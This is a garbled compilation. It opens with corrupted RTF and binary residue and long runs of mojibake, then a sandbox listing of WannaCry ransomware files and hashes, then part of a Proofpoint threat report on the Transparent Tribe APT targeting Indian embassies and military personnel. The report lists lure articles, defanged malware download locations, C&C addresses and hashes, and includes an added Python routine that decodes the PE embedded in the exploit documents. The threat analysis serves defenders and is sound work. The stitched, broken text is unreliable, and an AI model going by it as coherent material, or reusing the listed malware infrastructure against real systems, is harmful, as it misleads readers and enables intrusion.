LGTlhCvTI+ZX+z7XKdNz4ATCsddiVKkwIyiRllfMN9ZaAZCB8WNOIyNi9G2/OxjyvqmKtwsiOB3j7ceyAJa/QSEeA8zHsIXiCC36PFVDcdmCqD81xmIOWCZTMcaWb+6j8DGOazwSuD44d/tU0usP XX^_]ZY[A\\A]A^A_H y, b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\loch\\af31502\\dbch\\af31505\\hich\\f31502 c1\ \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 n s}{ 
y8i2fYBTyuBcNxWcntZeisRTik0VUSXxnI8cPKI/kXIfXJXZl7lMCe7CRSKXpamF6gnW9nYF0/bY0jDrGDOMfMlfX9gxNcRK0bNfKb/+lMKIDEgt+PTp5QuDk1crSIEZQCwIij4GAM2D3Wt0diQxBm8SdXuxluqn32euSzCZlABwd48c2DJ+8iX9UoKhenzfMi+jyxari0QtHjeYzgKy5V0oR/L730E+mhs2q36TUdaIz/W/0O3FgJKWr4yX2Pad2WinP7NSTRihMFI3Tc6a7yiG8Xipea6/rb4xKDuFdzSlt2qxO1gOq8zKrNprnQ38zGhAPDC6GZ+M0XvrnuVyyQO6sfzu+cUYuYECAzJt1URLiEny+XBa6xWTqM0 ZGmd8BcCP4ShszR87mgTzOdh0qSksI4y3u2Xx3L/ypVGHNy8TCXgGPj+6R7gmNn3qOvG8VWjn0QzWNsu5MGunuzfTGJiKDQVA/d5jv+xi7TnyDpRlLSH2QUFiWjaV0skdp7fKlkoRJDqmG0O43unAias94QwH6q9Rshjiz7AGc4M1qgb0wG5m9w5KosxeZ9QlYSwTd+SuyCdZXyZDTNOeN+1ZL4/AFWTiJUuxfICBo268E3uQOW74T3zcjowxGFiP0u68jRXasOJEBLSEnp5ToPPjwp/SLcRoIVWTwk6/6h62ut9SoO8NMztL4fmasIWbzdM+WSPswqQjkbQl1CYQLGXGnDevjRcEIzq1vq1nFK/IJu4yCYIQcfLwcc {\\*\\cs17 \\additive \\spriority0 \\styrsid4986254 css;}{\\*\\cs18 \\additive \\rtlch\\fcs1 \\af0 \\ltrch\\fcs0 l\\cf17 \\sbasedon10 \\sunhideused \\styrsid4986254 Hyperlink;}}{\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid4986254\\rsid5312551\\rsid5783536\\rsid7935111 {\\*\\latentstyles\\lsdstimax267\\lsdlockeddef0\\lsdsemihiddendef1\\lsdunhideuseddef1\\lsdqformatdef0\\lsdprioritydef99{\\lsdlockedexcept \\lsdsemihidden0 \\lsdunhideused0 \\lsdqformat1 \\lsdpriority0 \\lsdlocked0 Normal; {\\*\\rsidtbl \\rsid1060393\\rsid1116386\\rsid1585482\\rsid1847526\\rsid2183709\\rsid5122917\\rsid5783536\\rsid8002206\\rsid8664178\\rsid14237745\\rsid14432744\\rsid14957115}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1 {\\*\\rsidtbl \\rsid1199835\\rsid1847526\\rsid2183709\\rsid5180496\\rsid10775863\\rsid11827162\\rsid12867363\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl 
\\rsid1847526\\rsid2052277\\rsid2183709\\rsid3094406\\rsid3241513\\rsid3475210\\rsid4617418\\rsid14237745\\rsid14315351\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0 {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid3110250\\rsid6447444\\rsid13779469\\rsid14237745\\rsid14432744\\rsid15532574\\rsid15803123}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid4400686\\rsid7362391\\rsid8666578\\rsid10424774\\rsid12063738\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid4928855\\rsid6827409\\rsid13056521\\rsid14237745\\rsid14432744\\rsid15803123\\rsid16268367}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid1847526\\rsid2183709\\rsid5593755\\rsid6228682\\rsid11282901\\rsid11698073\\rsid14178431\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid335535\\rsid1847526\\rsid2183709\\rsid7240468\\rsid8458214\\rsid11828659\\rsid12743656\\rsid14237745\\rsid14432744}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl \\rsid420751\\rsid1847526\\rsid2183709\\rsid4476117\\rsid14178431\\rsid14237745\\rsid14432744\\rsid14574943\\rsid15614891}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\rsidtbl 
\\rsid4763\\rsid1847526\\rsid2183709\\rsid8528114\\rsid11406400\\rsid12997017\\rsid14237745\\rsid14432744\\rsid15803869}{\\mmathPr\\mmathFont34\\mbrkBin0\\mbrkBinSub0\\msmallFrac0\\mdispDef1\\mlMargin0\\mrMargin0\\mdefJc1\\mwrapIndent1440\\mintLim0\\mnaryLim1} {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid11406400\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid11828659\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid12867363\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid1585482\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid1838094\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid3094406\\sftnbj {\\*\\pnseclvl1\\pnucrm\\pnstart1\\pnindent720\\pnhang {\\pntxta \\hich .}}{\\*\\pnseclvl2 {\\*\\wgrffmtfilter 2450}\\nofeaturethrottle1\\ilfomacatclnup0\\ltrpar \\sectd \\ltrsect\\linex0\\endnhere\\sectlinegrid360\\sectdefaultcl\\sectrsid3689921\\sftnbj 
[RTF header residue: font tables, section and list-numbering definitions and repeated, truncated \info blocks dumped as raw control words; the control words themselves are not reproduced here. Recoverable metadata from the span: default language \deflang1033 with \deflangfe1042; a font table naming Times New Roman, Arial, Courier New, Cambria, Cambria Math, Calibri, Consolas, MS Mincho, Batang, MingLiU, GulimChe, Microsoft YaHei and Malgun Gothic; letter-size pages (\paperw12240\paperh15840); nine \info blocks, each with {\author Messi}{\operator Messi}, creation times 2017-05-11 13:52 to 13:56, revision times 2017-05-11 14:45 to 18:56, \version3 (the last \version9) and word counts between 36 and 319; one embedded text fragment ">. Meilleur moment pour vérifier: de 9h00 à 11h00 du lundi au vendredi."; the string "l]k]Y~a"; and one GUID {AEBA21FA-782A-4A90-978D-B72164C80120}.]
xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd \xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2\xbd\xc3\xaf\xc2\xbf\xc2
Extracted Files

Displaying 22 extracted file(s). The remaining 46 file(s) are available in the full version and XML/JSON reports.

Malicious (2)

m_french.wnry
  Size: 38KiB (38437 bytes)
  Type: rtf (Rich Text Format data, version 1, unknown character set)
  AV scan result: labeled as "TROJ_RANSOMNOTE.RTF" (11/59)
  Runtime process: tasksche.exe (PID: 3032)
  MD5: 4e57113a6bf6b88fdd32782a4a381274
  SHA1: 0fccbc91f0f94453d91670c6794f71348711061d
  SHA256: 9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

tasksche.exe
  Size: 3.4MiB (3514368 bytes)
  Type: peexe executable (PE32 executable (GUI) Intel 80386, for MS Windows)
  AV scan result: labeled as "Trojan.Ransom.WannaCryptor" (58/66)
  Runtime process: mssecsvc.exe (PID: 2376)
  MD5: aa64124adee1fb401441d6c62aadfba3
  SHA1: fdeb0ecaf56bb7e5b913f16e14c1a48a89c6ecfc
  SHA256: d4e4ae93dd8181a827b6a17fee4a0bc06fdcaa6c6c2970cb756d497a4cfdf3a5

Informative (20)

All of the following were written by the runtime process tasksche.exe (PID: 3032).

m_bulgarian.wnry (47KiB, 47879 bytes)
  MD5: 95673b0f968c0f55b32204361940d184
  SHA1: 81e427d15a1a826b93e91c3d2fa65221c8ca9cff
  SHA256: 40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

m_chinese (simplified).wnry (53KiB, 54359 bytes)
  MD5: 0252d45ca21c8e43c9742285c48e91ad
  SHA1: 5c14551d2736eef3a1c1970cc492206e531703c1
  SHA256: 845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

m_chinese (traditional).wnry (77KiB, 79346 bytes)
  MD5: 2efc3690d67cd073a9406a25005f7cea
  SHA1: 52c07f98870eabace6ec370b7eb562751e8067e9
  SHA256: 5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

m_croatian.wnry (38KiB, 39070 bytes)
  MD5: 17194003fa70ce477326ce2f6deeb270
  SHA1: e325988f68d327743926ea317abb9882f347fa73
  SHA256: 3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

m_czech.wnry (40KiB, 40512 bytes)
  MD5: 537efeecdfa94cc421e58fd82a58ba9e
  SHA1: 3609456e16bc16ba447979f3aa69221290ec17d0
  SHA256: 5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

m_danish.wnry (36KiB, 37045 bytes)
  MD5: 2c5a3b81d5c4715b7bea01033367fcb5
  SHA1: b548b45da8463e17199daafd34c23591f94e82cd
  SHA256: a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

m_dutch.wnry (36KiB, 36987 bytes)
  MD5: 7a8d499407c6a647c03c4471a67eaad7
  SHA1: d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b
  SHA256: 2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

m_english.wnry (36KiB, 36973 bytes)
  MD5: fe68c2dc0d2419b38f44d83f2fcf232e
  SHA1: 6c6e49949957215aa2f3dfb72207d249adf36283
  SHA256: 26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

m_filipino.wnry (37KiB, 37580 bytes)
  MD5: 08b9e69b57e4c9b966664f8e1c27ab09
  SHA1: 2da1025bbbfb3cd308070765fc0893a48e5a85fa
  SHA256: d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

m_finnish.wnry (37KiB, 38377 bytes)
  MD5: 35c2f97eea8819b1caebd23fee732d8f
  SHA1: e354d1cc43d6a39d9732adea5d3b0f57284255d2
  SHA256: 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

m_german.wnry (36KiB, 37181 bytes)
  MD5: 3d59bbb5553fe03a89f817819540f469
  SHA1: 26781d4b06ff704800b463d0f1fca3afd923a9fe
  SHA256: 2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

m_greek.wnry (48KiB, 49044 bytes)
  MD5: fb4e8718fea95bb7479727fde80cb424
  SHA1: 1088c7653cba385fe994e9ae34a6595898f20aeb
  SHA256: e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

m_indonesian.wnry (36KiB, 37196 bytes)
  MD5: 3788f91c694dfc48e12417ce93356b0f
  SHA1: eb3b87f7f654b604daf3484da9e02ca6c4ea98b7
  SHA256: 23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

m_italian.wnry (36KiB, 36883 bytes)
  MD5: 30a200f78498990095b36f574b6e8690
  SHA1: c4b1b3c087bd12b063e98bca464cd05f3f7b7882
  SHA256: 49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

m_japanese.wnry (80KiB, 81844 bytes)
  MD5: b77e1221f7ecd0b5d696cb66cda1609e
  SHA1: 51eb7a254a33d05edf188ded653005dc82de8a46
  SHA256: 7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

m_korean.wnry (89KiB, 91501 bytes)
  MD5: 6735cb43fe44832b061eeb3f5956b099
  SHA1: d636daf64d524f81367ea92fdafa3726c909bee1
  SHA256: 552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

m_latvian.wnry (40KiB, 41169 bytes)
  MD5: c33afb4ecc04ee1bcc6975bea49abe40
  SHA1: fbea4f170507cde02b839527ef50b7ec74b4821f
  SHA256: a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

m_norwegian.wnry (37KiB, 37577 bytes)
  MD5: ff70cc7c00951084175d12128ce02399
  SHA1: 75ad3b1ad4fb14813882d88e952208c648f1fd18
  SHA256: cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

m_polish.wnry (39KiB, 39896 bytes)
  MD5: e79d7f2833a9c2e2553c7fe04a1b63f4
  SHA1: 3d9f56d2381b8fe16042aa7c4feb1b33f2baebff
  SHA256: 519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e
© 2019 Hybrid Analysis
Operation Transparent Tribe
Threat Insight

Introduction

Proofpoint researchers recently uncovered evidence of an advanced persistent threat (APT) against Indian diplomatic and military resources. Our investigation began with malicious emails sent to Indian embassies in Saudi Arabia and Kazakhstan but turned up connections to watering hole sites focused on Indian military personnel and designed to drop a remote access Trojan (RAT) with a variety of data exfiltration functions. Our analysis shows that many of the campaigns and attacks appear related by common IOCs, vectors, payloads, and language, but the exact nature and attribution associated with this APT remain under investigation. At this time, the background and analysis in this paper provide useful forensics and detail our current thinking on the malware that we have dubbed "MSIL/Crimson".

Attack against Indian Embassies in Saudi Arabia and Kazakhstan

On February 11, 2016, we discovered two attacks minutes apart directed towards officials at Indian embassies in both Saudi Arabia and Kazakhstan. Both e-mails (Fig. 1, 2) were sent from the same originating IP address (5.189.145[.]248) belonging to Contabo GmbH, a hosting provider that seems to be currently favored by these threat actors. The e-mails also likely utilized Rackspace's MailGun service (https://www.rackspace.com/en-us/mailgun) and both carried the exact same attachment.

Emails:
4a0728a48c393a480dc328c0e972d57c5493ee5619699e9c21ff7e800948c8e8, "def.astana"
839569f031a2cb6e9ae1dc797b1bd7cce53d3528c8b5fbec21cecb0de3f5ac88, "def.riyadh"
Attachment: 3966f669a6af4278869b9cce0f2d9279, Harrasment (sic) Case Shakantula.doc
Exploit: CVE-2012-0158
Dropped: 6a69cd7a2cb993994fccec7b7e99c5daa5ec8083ba887142cb0242031d7d4966, svchost.exe
Functionality: downloader

Author: Darien Huss

Figure 1: First email sent to Embassy of India, Astana, Kazakhstan
Figure 2: Second email sent to Embassy of India, Riyadh, Kingdom of Saudi Arabia

In this incident, the attachment was a weaponized RTF document utilizing CVE-2012-0158 to drop an embedded, encoded portable executable (PE). To decode the embedded PE, the document's shellcode first searches for the 0xBABABABA marker which, when found, indicates the beginning position of the PE (Fig. 3). The PE is then decoded using the key 0xCAFEBABE while skipping null DWORDs (Fig. 4). A final marker, in this case 0xBBBBBBBB, indicates the end of the PE file. This decode routine, including other components of the exploit document, has been discussed before (http://blog.malwareclipboard.com/2015/10/rtf-exploit-document-extraction.html) and has been observed in completely unrelated incidents.

Figure 3: Shellcode searching for 0xBABABABA marker
Figure 4: Decoding of encoded PE and searching for terminator marker

After successful exploitation and decoding of the embedded payload, a family of malware we refer to as MSIL/Crimson will be executed on the victim's machine. The first stage in infection is a downloader whose purpose is to download the more fully featured RAT component. The MSIL/Crimson downloader that was dropped (md5: 3a67ebcab5dc3563dc161fdc3c7fb161) will attempt to download the full RAT from 213.136.87[.]122:10001 (Fig. 5).
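The marker-and-key decode routine described above is simple enough to reimplement as a static extractor, which is how an analyst would pull the dropped PE out of a captured document without detonating it. The following is an added example written for this page, not Proofpoint's tooling or the shellcode itself. Two details are assumptions, because the report only says "decoded using the key" and "skipping null DWORDs": the decode operation is taken to be a DWORD-wise XOR with 0xCAFEBABE, and "skipping" is taken to mean that all-zero DWORDs are copied through untouched rather than dropped. The encoder, the sample "PE" and the wrapper document are constructed here purely so the round trip can be checked offline.

```python
"""Extractor for the marker-delimited, DWORD-XOR-encoded PE embedding
described above (start marker 0xBABABABA, key 0xCAFEBABE, end marker
0xBBBBBBBB). Added example; not Proofpoint's tooling. The encoder is a
constructed stand-in so the round trip can be checked offline."""
import struct
from typing import Optional

START_MARKER = struct.pack("<I", 0xBABABABA)
END_MARKER = struct.pack("<I", 0xBBBBBBBB)
XOR_KEY = 0xCAFEBABE


def encode_pe(pe: bytes, key: int = XOR_KEY) -> bytes:
    """Attacker-side transform, assumed from the description: XOR every
    DWORD with the key, leaving all-zero DWORDs untouched ("skipping null
    DWORDs"). Pads the input to a DWORD boundary first."""
    pe += b"\x00" * (-len(pe) % 4)
    return b"".join(
        struct.pack("<I", d ^ key if d else 0)
        for (d,) in struct.iter_unpack("<I", pe)
    )


def wrap_in_document(pe: bytes) -> bytes:
    """Constructed stand-in for the weaponized RTF body: filler, start
    marker, encoded PE, end marker, trailing filler. A real document puts
    this after the exploit trigger; the extractor only needs the markers."""
    return (b"{\\rtf1 constructed filler " * 3
            + START_MARKER + encode_pe(pe) + END_MARKER
            + b" trailing filler}")


def extract_embedded_pe(blob: bytes, key: int = XOR_KEY) -> Optional[bytes]:
    """Mirror the shellcode: locate the start marker, then decode DWORD by
    DWORD (zero DWORDs pass through) until the end marker. Returns None if
    either marker is missing, which is the behaviour you want in a bulk
    triage loop: no terminator means a truncated file or a different encoder."""
    start = blob.find(START_MARKER)
    if start < 0:
        return None
    out = bytearray()
    pos = start + len(START_MARKER)
    while pos + 4 <= len(blob):
        chunk = blob[pos:pos + 4]
        if chunk == END_MARKER:
            return bytes(out)
        (d,) = struct.unpack("<I", chunk)
        out += struct.pack("<I", d ^ key if d else 0)
        pos += 4
    return None


def looks_like_pe(data: Optional[bytes]) -> bool:
    """Cheap sanity check before handing the result to a PE parser: 'MZ' at
    offset 0 and an e_lfanew (offset 0x3C) that points at 'PE\\0\\0'."""
    if not data or data[:2] != b"MZ" or len(data) < 0x40:
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed, not a real executable: a minimal DOS header whose e_lfanew
# points at a 'PE\0\0' signature at 0x40, followed by filler bytes.
SAMPLE_PE = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
             + b"PE\x00\x00" + b"constructed-not-a-real-pe...")

if __name__ == "__main__":
    doc = wrap_in_document(SAMPLE_PE)
    recovered = extract_embedded_pe(doc)
    print("round trip ok:", recovered == SAMPLE_PE, "pe header ok:", looks_like_pe(recovered))
```

Because zero DWORDs are left as zero, the long runs of nulls in a real DOS header and section padding do not turn into a repeating CAFEBABE pattern in the document, which is also why a naive "XOR everything after the marker" decoder produces a corrupt header on these samples.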
A full description and analysis of the MSIL/Crimson malware family is provided in the Technical Analysis section.

Figure 5: MSIL/Crimson downloading RAT

Fake blog with an Indian military emphasis leads to MSIL/Crimson and more

While conducting research related to MSIL/Crimson, Proofpoint researchers discovered a malicious blogspot.com site (Fig. 6), intribune.blogspot[.]com, that appears to have been set up to lure Indian military officials into becoming infected with MSIL/Crimson, njRAT, and possibly other malicious tools. This site is likely operated by the same actor(s) that carried out the previously discussed attacks on Indian embassy officials, based on shared C&C infrastructure as discussed in the Cluster Analysis section. Most of the published stories contain some method of directing potential victims to a malicious payload, although a few of the stories did not contain any malicious code at the time of analysis. In the following articles from this site, we see the threat actors conducting their malicious activities in multiple ways:
1. Using hyperlinks via an image or text
2. Using the same hypertext link in the article text, on the story's image, and in an iframe
3. The final article in this section contains a link to an additional website that is likely operated by the same threat actor(s) and connected to other email campaigns

Lure articles

4 Sikh Army Officers being trialed in military court on alleged involvement with KLF
Link: hxxp://intribune.blogspot[.]com/2015/11/4-sikh-army-officers-being-trialed-in.html
Malicious Document Location: hxxp://bbmsync2727[.]com/news/4%20Sikh%20Army%20Officers%20being%20trialed.doc
Document: 0197ff119e1724a1ffbf33df14411001
Type: Exploit, CVE-2012-0158, Embedded Payload
Dropped: njRAT - 27ca136850214234bcdca765dfaed79f
C&C: 5.189.145[.]248:10032

Figure 6: Article lure leading to exploit document capable of installing njRAT on vulnerable machines
Figure 7: Decoy document dropped by "4 Sikh Army Officers being trialed.doc"

One notable difference between this article and the rest is that it contained an iframe pointing to the same document linked to via the "Read More" hyperlink. This iframe causes visitors to be prompted to download the document immediately upon visiting, as well as from the top level of the malicious website.

Figure 8: Iframe linking to malicious document

Seventh pay commission recommends overall hike of 23.55%
Link: hxxp://intribune.blogspot[.]com/2015/11/seventh-pay-commission-recommends.html
At the time of analysis, this web page contained no malicious links; however, we discovered a document that was likely either prepared for this page or was previously linked to by this page.
Malicious Document Location: hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator.xls
Document: 0e93b58193fe8ff8b84d543b535f313c
Additional Document Location: hxxp://bbmsync2727[.]com/cu/awho_handot_2015.xls
VBS Location: hxxp://bbmsync2727[.]com/cu/su.exe
Payload (older): 07e44ffcffde46ad96eb9c018bed6193 (DarkComet)
C&C (older): 5.189.145[.]248:1453
Payload (newer): 708a1af68d532df35c34f7088b8e798f (Luminosity Link RAT)
C&C (newer): 5.189.145[.]248:6318

Figure 9: Article lure with no link, but which likely led to DarkComet or other malware

Army Air Defence (sic), Engineers and Signal to get additional colonels posts
Link: hxxp://intribune.blogspot[.]com/2015/11/army-air-defenceengineers-and-signal-to.html
Malicious Document Location: hxxp://birthdaywisheszone[.]com/pml/army-air-defenceengineers-and-signal.doc
Document: 68773f362d5ab4897d4ca217a9f53975
Type: Exploit, CVE-2012-0158, Embedded Payload
Dropped: dac4f8ba3190cfa1f813e79864a73fe1 (MSIL/Crimson Downloader)
C&C: 213.136.87[.]122:10001
Downloaded MSIL/Crimson RAT: f078b5aeaf73831361ecd96a069c9f50

Figure 10: Article lure ultimately leading to MSIL/Crimson RAT
Figure 11: Decoy document dropped by "army-air-defenceengineers-and-signal.doc"

SC Seeks Army response on batch parity in officers promotion
Link: hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html
Malicious Document Location: hxxp://www[.]avadhnama[.]com/latest/batchparity-command-exit-policy.doc
Unfortunately we have not been able to retrieve the document hosted at that location; however, another file was located in the same directory:
Location: hxxp://avadhnama[.]com/latest/ssbs.exe
Hash: df6b3946d1064f37d1b99f7bfae51203 (MSIL/Crimson Downloader)
C&C: 213.136.87[.]122:10001
Downloaded MSIL/Crimson RAT: c2bc8bc9ff7a34f14403222e58963507

Figure 12: Article lure possibly leading to MSIL/Crimson RAT

Seniors Juniors and coursemates please take a serious note about it
Location: hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html
Potential Payload Location: hxxp://sms[.]totalworthy[.]com/intribune.zip
Unfortunately we have been unsuccessful in retrieving intribune.zip and are unsure what, if any, payloads it may have contained.

Figure 13: Article lure leading to a likely malicious payload in the past

